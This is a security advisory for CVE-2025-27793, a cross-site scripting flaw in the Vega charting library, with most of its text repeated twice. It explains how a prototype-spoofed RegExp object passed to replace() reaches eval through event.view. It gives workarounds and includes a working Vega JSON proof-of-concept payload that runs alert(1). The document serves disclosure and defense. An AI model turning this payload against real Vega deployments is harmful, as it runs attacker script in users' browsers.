Headline
GHSA-963h-3v39-3pqf: Vega vulnerable to Cross-site Scripting via RegExp.prototype[@@replace]
Impact
Users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library is used with the vega-interpreter.
Workarounds
- Use
vegawith expression interpreter - Upgrade to a newer Vega version (
5.32.0)
POC Summary
Calling replace with a RegExp-like pattern calls RegExp.prototype[@@replace], which can then call an attacker-controlled exec function.
POC Details
Consider the function call replace('foo', {__proto__: /h/.constructor.prototype, global: false}). Since pattern has RegExp.prototype[@@replace], pattern.exec('foo') winds up being called.
The resulting malicious call looks like this:
replace(<string argument>, {__proto__: /h/.constructor.prototype, exec: <function>, global: false})
Since functions cannot be returned from this, an attacker that wishes to escalate to XSS must abuse event.view to gain access to eval.
Reproduction steps
{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","on":[{"events":"body:mousemove{99999}","update":"replace('alert(1)',{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})"}]}]}
Impact
Users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library is used with the vega-interpreter.
Workarounds
- Use vega with expression interpreter
- Upgrade to a newer Vega version (5.32.0)
POC Summary
Calling replace with a RegExp-like pattern calls RegExp.prototype[@@replace], which can then call an attacker-controlled exec function.
POC Details
Consider the function call replace('foo’, {proto: /h/.constructor.prototype, global: false}). Since pattern has RegExp.prototype[@@replace], pattern.exec(‘foo’) winds up being called.
The resulting malicious call looks like this:
replace(<string argument>, {__proto__: /h/.constructor.prototype, exec: <function>, global: false})
Since functions cannot be returned from this, an attacker that wishes to escalate to XSS must abuse event.view to gain access to eval.
Reproduction steps
{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","on":[{"events":"body:mousemove{99999}","update":"replace('alert(1)',{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})"}]}]}
References
- GHSA-963h-3v39-3pqf
- https://nvd.nist.gov/vuln/detail/CVE-2025-27793
- vega/vega@694560c
- https://github.com/vega/vega/releases/tag/v5.32.0
- https://vega.github.io/vega/usage/interpreter